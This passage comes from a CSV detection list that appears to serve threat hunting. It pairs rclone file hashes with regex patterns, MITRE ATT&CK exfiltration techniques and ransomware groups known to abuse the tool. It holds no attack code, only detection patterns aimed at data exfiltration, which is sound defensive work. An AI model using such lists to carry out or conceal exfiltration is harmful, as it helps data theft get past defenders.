- 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*822855a1e7c58a8b1cf0ec31a900a03009dd1015135f98d99cf6aac1472b000f*",".{0,1000}822855a1e7c58a8b1cf0ec31a900a03009dd1015135f98d99cf6aac1472b000f.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data 
Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*826463d9a2bc5e511e091c24be7d4bf6f2df396702662fb528498223ccb39b94*",".{0,1000}826463d9a2bc5e511e091c24be7d4bf6f2df396702662fb528498223ccb39b94.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*829f65af61d795563f2651987a1146b49eaad6469d779074c4efd32433b4a6cd*",".{0,1000}829f65af61d795563f2651987a1146b49eaad6469d779074c4efd32433b4a6cd.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*82aa8a39e1cc14668a60048c7375ebd45f1bb5734863ad2cac1309c63f05c57f*",".{0,1000}82aa8a39e1cc14668a60048c7375ebd45f1bb5734863ad2cac1309c63f05c57f.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage 
services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*82e748eaceebf6c4612c4d7fb4c3bd9773c954ba7ef0a4912bca33084b14c2c7*",".{0,1000}82e748eaceebf6c4612c4d7fb4c3bd9773c954ba7ef0a4912bca33084b14c2c7.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*82ecdddcaec5ccde85ce2235c25aaebc70f24d3837917d7816c32ed6874c495f*",".{0,1000}82ecdddcaec5ccde85ce2235c25aaebc70f24d3837917d7816c32ed6874c495f.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data 
Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*82fe60166f0c57916272576f45e5465f16b5b8272c37cfc3786de8130a0c48e4*",".{0,1000}82fe60166f0c57916272576f45e5465f16b5b8272c37cfc3786de8130a0c48e4.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*830d07f44abea51f4549edc31d61ad228e6621c60aebfd6e241ca5aa5abf14f7*",".{0,1000}830d07f44abea51f4549edc31d61ad228e6621c60aebfd6e241ca5aa5abf14f7.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*832974dc5dbee7b88c6d51acbcbe612ca5e2ee5a7d3101308135e433246cdb8f*",".{0,1000}832974dc5dbee7b88c6d51acbcbe612ca5e2ee5a7d3101308135e433246cdb8f.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage 
services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*843af28bae0fffafaf6c1aadce104fd299b3bd4c0b6d2d72ae9f4f7000167cf5*",".{0,1000}843af28bae0fffafaf6c1aadce104fd299b3bd4c0b6d2d72ae9f4f7000167cf5.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*84431e99daa0524ebef7f8ca6090243f7287b52bdd37afcbbdad8c52c516d5c5*",".{0,1000}84431e99daa0524ebef7f8ca6090243f7287b52bdd37afcbbdad8c52c516d5c5.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data 
Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*84dcc12153f8b7d66923070bf81d5c8f5dbc300baf8c37d7ab41f79d60358ab5*",".{0,1000}84dcc12153f8b7d66923070bf81d5c8f5dbc300baf8c37d7ab41f79d60358ab5.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*84f1ec6bd03bb770c9efe79a396dbd41ad417d691522638a331a493dfc42f0f2*",".{0,1000}84f1ec6bd03bb770c9efe79a396dbd41ad417d691522638a331a493dfc42f0f2.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*853e033af8339767d2ccc03845763bd250238ee0642d4042e027a5359a56760d*",".{0,1000}853e033af8339767d2ccc03845763bd250238ee0642d4042e027a5359a56760d.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage 
services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*85c5f89ba2e10c646acc5912cb3a8c33857c40551b363257f23cfe855a1e3c54*",".{0,1000}85c5f89ba2e10c646acc5912cb3a8c33857c40551b363257f23cfe855a1e3c54.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*85c623d7808f9d2cf51945e02e98d02b94f9f32ea892237f9a58b544c7a4f4f9*",".{0,1000}85c623d7808f9d2cf51945e02e98d02b94f9f32ea892237f9a58b544c7a4f4f9.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data 
Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*85d2f62537a5e72af0ea4f43f1d476f95f2081db5d42836823ba9be7684c7ac2*",".{0,1000}85d2f62537a5e72af0ea4f43f1d476f95f2081db5d42836823ba9be7684c7ac2.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*85dcecfbdf9927330ab06a6d347e91d6e780ee800bd9aa1b82b9d32f8c83a72f*",".{0,1000}85dcecfbdf9927330ab06a6d347e91d6e780ee800bd9aa1b82b9d32f8c83a72f.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*861fe019ac96ac55b5e0e97c8d6138773a11b64f8cbd3530f51f56eb6009326c*",".{0,1000}861fe019ac96ac55b5e0e97c8d6138773a11b64f8cbd3530f51f56eb6009326c.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage 
services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*865bbc5b3cae67db29423ec7c3d4795e2685dd568ae504087a1a36aca8b78cba*",".{0,1000}865bbc5b3cae67db29423ec7c3d4795e2685dd568ae504087a1a36aca8b78cba.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*86bfc150238405ea58c396e25766dee4b1e01caedbcfd32ed3fd74533e29d910*",".{0,1000}86bfc150238405ea58c396e25766dee4b1e01caedbcfd32ed3fd74533e29d910.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data 
Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*86f782aab22bf6fff00382de47905a313a94c3e6d1d73d9f8100c59472d48e08*",".{0,1000}86f782aab22bf6fff00382de47905a313a94c3e6d1d73d9f8100c59472d48e08.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*8704f3f1748b05a7d936a23172b3248acda6e5dfbe58a192872ae779755de513*",".{0,1000}8704f3f1748b05a7d936a23172b3248acda6e5dfbe58a192872ae779755de513.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*876f05d707463603766c0d3073d2806f6a3b89b50d4c1c32f5a754a3db52c5c4*",".{0,1000}876f05d707463603766c0d3073d2806f6a3b89b50d4c1c32f5a754a3db52c5c4.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage 
services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*877dc57373b8c8b98f7afb6a818a465dbf855f8d6a9b7330805fa08abfb197c3*",".{0,1000}877dc57373b8c8b98f7afb6a818a465dbf855f8d6a9b7330805fa08abfb197c3.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*8787b7404348874e5917f55316fcbae979f0b1358d9fa7c3c13f5019027afde4*",".{0,1000}8787b7404348874e5917f55316fcbae979f0b1358d9fa7c3c13f5019027afde4.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data 
Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*879b6b220338f388f14152df2b7b92abce0baa3feac0de0858fd2c6c7a906637*",".{0,1000}879b6b220338f388f14152df2b7b92abce0baa3feac0de0858fd2c6c7a906637.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*87a2fcc9f478c587a81b872f0943a0a280b6c663bb56222131c8b685f14ee1f2*",".{0,1000}87a2fcc9f478c587a81b872f0943a0a280b6c663bb56222131c8b685f14ee1f2.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*87c37a74f246d2cdb49d5392c0bbe27e09033446346e839204eabd47224d5880*",".{0,1000}87c37a74f246d2cdb49d5392c0bbe27e09033446346e839204eabd47224d5880.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage 
services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*880a24b003db1825ec63774cb5cb0c8a0b848d254eac6f977b700649e2baf4d9*",".{0,1000}880a24b003db1825ec63774cb5cb0c8a0b848d254eac6f977b700649e2baf4d9.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*88ed9c876b03d2cc745463903ac5233e441cd56d0d1031906bc8381af11ea0c8*",".{0,1000}88ed9c876b03d2cc745463903ac5233e441cd56d0d1031906bc8381af11ea0c8.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data 
Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*891355660e32ea092c0af8602c2fad7602196bed297218d41ce8ba307ab84459*",".{0,1000}891355660e32ea092c0af8602c2fad7602196bed297218d41ce8ba307ab84459.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*8914b7193d1961310e5247a9217ca8ed80bf212a25c889d432594f9ba533462d*",".{0,1000}8914b7193d1961310e5247a9217ca8ed80bf212a25c889d432594f9ba533462d.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*8922dfdc60c1bfb47a62ba4635e764a7e2882e6d8c74bcd96f8c5c1021000682*",".{0,1000}8922dfdc60c1bfb47a62ba4635e764a7e2882e6d8c74bcd96f8c5c1021000682.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage 
services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*895d847eec516f9d8eb2cf8a08408c92523d1430d9dc2e91c5ed5268eb424479*",".{0,1000}895d847eec516f9d8eb2cf8a08408c92523d1430d9dc2e91c5ed5268eb424479.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*89fc051ffcc3b4b549366dddc833f7f60f0115b7adc026cfdadb043d694d4332*",".{0,1000}89fc051ffcc3b4b549366dddc833f7f60f0115b7adc026cfdadb043d694d4332.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data 
